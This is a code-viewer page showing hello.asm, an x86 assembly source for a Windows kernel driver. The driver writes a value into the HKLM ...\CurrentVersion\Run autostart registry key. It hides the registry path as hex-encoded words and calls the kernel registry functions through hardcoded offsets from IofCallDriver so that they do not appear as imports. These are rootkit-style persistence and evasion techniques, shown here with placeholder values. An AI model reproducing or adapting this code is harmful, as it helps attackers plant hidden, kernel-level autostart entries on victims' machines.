📄 hello.asm
字号:
.386
.model flat,stdcall
_imp__ZwOpenKey PROTO NEAR32 stdcall,
nStdHandle:DWORD,
nStdHandle1:DWORD,
nStdHandle2:DWORD
_imp_@IofCallDriver PROTO NEAR32 stdcall,
nStdHandle:DWORD,
nStdHandle1:DWORD
_imp__ZwSetValueKey PROTO NEAR32 stdcall,
nStdHandle:DWORD,
nStdHandle1:DWORD,
nStdHandle2:DWORD,
nStdHandle3:DWORD,
nStdHandle4:DWORD,
nStdHandle5:DWORD
_imp__ZwClose PROTO NEAR32 stdcall,
nStdHandle:DWORD
public DriverEntry@8
.CODE
DriverEntry@8:
jmp Start
RunPath DW 05CH, 052H, 065H, 067H, 069H, 073H, 074H, 072H, 079H, 05CH, 04DH, 061H, 063H, 068H, 069H, 06EH
DW 065H, 05CH, 053H, 06FH, 066H, 074H, 077H, 061H, 072H, 065H, 05cH, 04dH, 069H, 063H, 072H, 06FH
DW 073H, 06FH, 066H, 074H, 05CH, 057H, 069H, 06EH, 064H, 06FH, 077H, 073H, 05CH, 043H, 075H, 072H
DW 072H, 065H, 06EH, 074H, 056H, 065H, 072H, 073H, 069H, 06FH, 06EH, 05CH, 052H, 075H, 06EH, 000H
RegPath DD 000800080H, RunPath
ObjAttr DD 018h, 0, RegPath, 0, 0, 0
RunKey DD ?
ValueNameStr DW 041H, 042H, 043H, 044H, 045H, 000H
ValueName DD 0000C000CH, ValueNameStr
ValueStr DW 045H, 044H, 043H, 042H, 041H, 000H
Start:
; enter procedure.
push ebp
mov ebp, esp
LEA EAX, ObjAttr
PUSH EAX
PUSH 0000F003FH
LEA EAX, RunKey
PUSH EAX
MOV EAX, _imp_@IofCallDriver
MOV eax, [eax]
ADD eax, 017979dh
; call ZwOpenKey
CALL eax
cmp eax, 0
jnz RETURN
SUCCESS:
; Load wide-char ValueStr
LEA EAX, ValueStr
; ValueStr length in bytes.
PUSH 00000000CH
; ValueStr address
PUSH EAX
; REG_SZ
PUSH 000000001H
; TitleIndex = 0
PUSH 000000000H
; Load unicode string ValueName
LEA EAX, ValueName
PUSH EAX
; load Handle
MOV EAX, RunKey
PUSH EAX
MOV EAX, _imp_@IofCallDriver
MOV eax, [eax]
ADD eax, 0179B32h
; call ZwSetValueKey
CALL eax
MOV EAX, [RunKey]
PUSH EAX
MOV EAX, _imp_@IofCallDriver
MOV eax, [eax]
ADD eax, 0179996h
; call ZwClose
CALL eax
RETURN:
XOR EAX, EAX
; leave procedure
mov esp, ebp
pop ebp
ret 08
END
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -